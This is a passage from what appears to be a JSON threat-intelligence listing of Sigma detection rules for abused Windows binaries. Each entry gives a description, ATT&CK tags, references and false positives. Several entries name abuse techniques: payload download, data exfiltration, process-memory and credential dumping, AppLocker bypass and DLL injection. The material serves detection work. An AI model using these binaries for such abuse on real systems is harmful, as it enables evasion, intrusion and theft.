Add more LOLBins to rule logic if needed.", - "uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937", - "value": "Lolbins Process Creation with WmiPrvse", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_lolbins_with_wmiprvse_parent_process.yml", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", - "uuid": "2f869d59-7f6a-4931-992c-cce556ff2d53", - "value": "Use of Adplus.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", - "https://twitter.com/nas_bench/status/1534916659676422152", - "https://twitter.com/nas_bench/status/1534915321856917506", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1003.001" - ], - "creation_date": "2022/06/09", - "filename": "proc_creation_win_lolbin_adplus.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage of Adplus" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - 
"description": "Execute C# code with the Build Provider and proper folder structure in place.", - "uuid": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", - "value": "Suspicious aspnet_compiler.exe Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2021/11/24", - "filename": "proc_creation_win_lolbin_aspnet_compiler.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Performs execution of specified file, can be used for defensive evasion.", - "uuid": "5edc2273-c26f-406c-83f3-f4d948e740dd", - "value": "Suspicious Subsystem for Linux Bash Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Bash/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2021/11/24", - "filename": "proc_creation_win_lolbin_bash.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a user downloads file by using CertOC.exe", - "uuid": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "value": "Suspicious File Download via CertOC.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/05/16", - "filename": 
"proc_creation_win_lolbin_certoc_download.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", - "uuid": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", - "value": "Custom Class Execution via Xwizard", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml", - "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "uuid": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "value": "Execution via CL_Invocation.ps1", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", - "https://twitter.com/bohops/status/948061991012327424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2020/10/14", - "filename": "proc_creation_win_lolbin_cl_invocation.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", - "uuid": 
"c57872c7-614f-4d7f-a40d-b78c8df2d30d", - "value": "CL_LoadAssembly.ps1 Proxy Execution", - "meta": { - "refs": [ - "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", - "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2022/05/21", - "filename": "proc_creation_win_lolbin_cl_loadassembly.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a Microsoft signed script to execute commands", - "uuid": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", - "value": "CL_Mutexverifiers.ps1 Proxy Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2022/05/21", - "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml", - "author": "oscd.community, Natalia Shornikova, frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", - "uuid": "f37aba28-a9e6-4045-882c-d5004043b337", - "value": "Suspicious Cmdl32 Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", - "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml" - ], - "tags": 
[ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ], - "creation_date": "2021/11/03", - "filename": "proc_creation_win_lolbin_cmdl32.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", - "uuid": "1f0f6176-6482-4027-b151-00071af39d7e", - "value": "Suspicious ConfigSecurityPolicy Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567" - ], - "creation_date": "2021/11/26", - "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries can abuse of C:\\Windows\\System32\\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target", - "uuid": "575dce0c-8139-4e30-9295-1ee75969f7fe", - "value": "GatherNetworkInfo.vbs Script Usage", - "meta": { - "refs": [ - "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cscript_gathernetworkinfo.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" - ], - "creation_date": "2022/01/03", - "filename": "proc_creation_win_lolbin_cscript_gathernetworkinfo.yml", - "author": "blueteamer8699", - "level": "medium", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", - "uuid": "84b14121-9d14-416e-800b-f3b829c5a14d", - "value": "Suspicious CustomShellHost Execution", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/180", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_customshellhost.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", - "uuid": "e290b10b-1023-4452-a4a9-eb31a9013b3a", - "value": "LOLBAS Data Exfiltration by DataSvcUtil.exe", - "meta": { - "refs": [ - "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", - "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567" - ], - "creation_date": "2021/09/30", - "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml", - "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ 
- "DataSvcUtil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", - "uuid": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", - "value": "DeviceCredentialDeployment Execution", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/147", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_device_credential_deployment.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", - "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", - "value": "Suspicious Diantz Alternate Data Stream Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2021/11/26", - "filename": "proc_creation_win_lolbin_diantz_ads.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Very Possible" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - 
}, - { - "description": "Download and compress a remote file and store it in a cab file on local machine.", - "uuid": "185d7418-f250-42d0-b72e-0c8b70661e93", - "value": "Suspicious Diantz Download and Compress Into a CAB File", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2021/11/26", - "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "uuid": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", - "value": "Xwizard DLL Sideloading", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", - "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2021/09/20", - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Windows installed on non-C drive" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "uuid": "129966c9-de17-4334-a123-8b58172e664d", - "value": "Suspicious Dump64.exe Execution", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1460597833917251595", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2021/11/26", - "filename": "proc_creation_win_lolbin_dump64.yml", - "author": "Austin Songer @austinsonger, Florian Roth", - "level": "high", - "falsepositive": [ - "Dump64.exe in other folders than the excluded one" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries can abuse winget to download payloads remotely and execute them without touching disk. Winget will be included by default in Windows 10 and is already available in Windows 10 insider programs. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", - "uuid": "313d6012-51a0-4d93-8dfc-de8553239e25", - "value": "Monitoring Winget For LOLbin Execution", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/04/21", - "filename": "proc_creation_win_lolbin_execution_via_winget.yml", - "author": "Sreeman, Florian Roth, Frack113", - "level": "medium", - "falsepositive": [ - "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Extexport.exe loads dll and is execute from other folder the original path", - "uuid": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", - "value": "Suspicious Extexport Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Extexport/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/11/26", - "filename": "proc_creation_win_lolbin_extexport.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Download or Copy file with Extrac32", - "uuid": "aa8e035d-7be4-48d3-a944-102aec04400d", - "value": "Suspicious Extrac32 Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2021/11/26", - "filename": "proc_creation_win_lolbin_extrac32.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Extract data from cab file and hide it in an alternate data stream", - "uuid": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", - "value": "Suspicious Extrac32 Alternate Data Stream Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - 
"creation_date": "2021/11/26", - "filename": "proc_creation_win_lolbin_extrac32_ads.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", - "uuid": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", - "value": "Abusing Findstr for Defense Evasion", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", - "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1564.004", - "attack.t1552.001", - "attack.t1105" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_win_lolbin_findstr.yml", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Administrative findstr usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execute commands and binaries from the context of \"forfiles\". 
This is used as a LOLBIN for example to bypass application whitelisting.", - "uuid": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", - "value": "Use of Forfiles For Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", - "https://pentestlab.blog/2020/07/06/indirect-command-execution/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/06/14", - "filename": "proc_creation_win_lolbin_forfiles.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use by a via a batch script or by an administrator." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", - "uuid": "b96b2031-7c17-4473-afe7-a30ce714db29", - "value": "Use of FSharp Interpreters", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/06/02", - "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "Legitimate use by a software developer." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", - "uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", - "value": "LOLBIN Execution Of The FTP.EXE Binary", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_lolbin_ftp.yml", - "author": "Victor Sergeev, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", - "uuid": "1e59c230-6670-45bf-83b0-98903780607e", - "value": "Gpscript Execution", - "meta": { - "refs": [ - "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/", - "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/05/16", - "filename": "proc_creation_win_lolbin_gpscript.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate uses of logon scripts distributed via group policy" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", - "uuid": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", - 
"value": "Ie4uinit Lolbin Use From Invalid Path", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", - "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/05/07", - "filename": "proc_creation_win_lolbin_ie4uinit.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of the IEExec utility to download payloads", - "uuid": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "value": "Abusing IEExec To Download Payloads", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml" - ], - "tags": "No established tags", - "creation_date": "2022/05/16", - "filename": "proc_creation_win_lolbin_ieexec_download.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", - "uuid": "850d55f9-6eeb-4492-ad69-a72338f65ba4", - "value": "Ilasm Lolbin Use Compile C-Sharp", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", - "https://www.echotrail.io/insights/search/ilasm.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/05/07", - "filename": "proc_creation_win_lolbin_ilasm.yml", - 
"author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", - "uuid": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", - "value": "Suspicious Execution of InstallUtil To Download", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/239", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_installutil_download.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", - "uuid": "52788a70-f1da-40dd-8fbd-73b5865d6568", - "value": "JSC Convert Javascript To Executable", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Jsc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/05/02", - "filename": "proc_creation_win_lolbin_jsc.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", - "uuid": 
"d047726b-c71c-4048-a99b-2e2f50dc107d", - "value": "Kavremover Dropped Binary LOLBIN Usage", - "meta": { - "refs": [ - "https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/11/01", - "filename": "proc_creation_win_lolbin_kavremover.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", - "uuid": "45d3a03d-f441-458c-8883-df101a3bb146", - "value": "Launch-VsDevShell.PS1 Proxy Execution", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1535981653239255040", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216.001" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage of the script by a developer" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "uuid": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", - "value": "Mavinject Inject DLL Into Running Process", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://twitter.com/gN3mes1s/status/941315826107510784", - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/SigmaHQ/sigma/issues/3742", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" - ], - "creation_date": "2021/07/12", - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", - "uuid": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", - "value": "Use of Mftrace.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/06/09", - "filename": 